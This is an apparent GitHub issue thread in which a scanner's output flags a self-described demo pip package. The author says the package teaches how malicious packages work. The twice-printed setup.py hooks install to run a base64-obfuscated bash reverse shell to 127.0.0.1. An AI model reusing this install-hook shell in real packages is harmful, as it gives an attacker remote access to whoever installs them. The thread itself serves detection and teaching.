### ISSUE TITLE
Detected :)

### ISSUE THREAD

**Issue by felixaime** [thegoodhackertv/malpip#1]
Hello,

Your code can be easly detected :)

Regards,
Félix.

```python

========== [ Possible malicious code detected in tghtestproj-1.0.0/setup.py ] ==========
import setuptools
from setuptools.command.install import install
from setuptools.command.develop import develop
import base64
import os

def b64d(base64_code):
    base64_bytes = base64_code.encode('ascii')
    code_bytes = base64.b64decode(base64_bytes)
    code = code_bytes.decode('ascii')
    return code

def notmalfunc():
    os.system(b64d("L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS8xMzM3IDA+JjEK"))

class AfterDevelop(develop):
    def run(self):
        develop.run(self)

class AfterInstall(install):
    def run(self):
        install.run(self)
        notmalfunc()

setuptools.setup(
    name = "tghtestproj",
    version = "1.0.0",
    author = "TGH",
    author_email = "tgh@example.com",
    description = "A test package to demonstrate malicious pip packages",
    long_description = "long description",
    long_description_content_type = "text/markdown",
    url = "https://github.com/thegoodhackertv/malpip",
    project_urls = {
        "Bug Tracker": "https://github.com/thegoodhackertv/malpip/issues",
    },
    classifiers = [
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    package_dir = {"": "src"},
    packages = setuptools.find_packages(where="src"),
    python_requires = ">=3.6",
    cmdclass={
        'develop': AfterDevelop,
        'install': AfterInstall,
    },
)
==========================================================
```

**Comment by thegoodhackertv** [comment]
Hello,

I have a YouTube channel (thegoodhacker) about cybersecurity and I’m showing how it’s possible to do this and how to prevent it. Not trying to hide anything, check the description in the code bellow :)

Thanks!

Andres On Mon, 20 Feb 2023 at 19:59 Félix Aimé ***@***.***> wrote:

Hello,

Your code can be easly busted :)

Regards,

Félix.

========== [ Possible malicious code detected in tghtestproj-1.0.0/setup.py ] ==========

import setuptools

from setuptools.command.install import install

from setuptools.command.develop import develop

import base64

import os



def b64d(base64_code):

    base64_bytes = base64_code.encode('ascii')

    code_bytes = base64.b64decode(base64_bytes)

    code = code_bytes.decode('ascii')

    return code



def notmalfunc():

    os.system(b64d("L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS8xMzM3IDA+JjEK"))



class AfterDevelop(develop):

    def run(self):

        develop.run(self)



class AfterInstall(install):

    def run(self):

        install.run(self)

        notmalfunc()



setuptools.setup(

    name = "tghtestproj",

    version = "1.0.0",

    author = "TGH",

    author_email = ***@***.***",

    description = "A test package to demonstrate malicious pip packages",

    long_description = "long description",

    long_description_content_type = "text/markdown",

    url = "https://github.com/thegoodhackertv/malpip",

    project_urls = {

        "Bug Tracker": "https://github.com/thegoodhackertv/malpip/issues",

    },

    classifiers = [

        "Programming Language :: Python :: 3",

        "License :: OSI Approved :: MIT License",

        "Operating System :: OS Independent",

    ],

    package_dir = {"": "src"},

    packages = setuptools.find_packages(where="src"),

    python_requires = ">=3.6",

    cmdclass={

        'develop': AfterDevelop,

        'install': AfterInstall,

    },

)

==========================================================
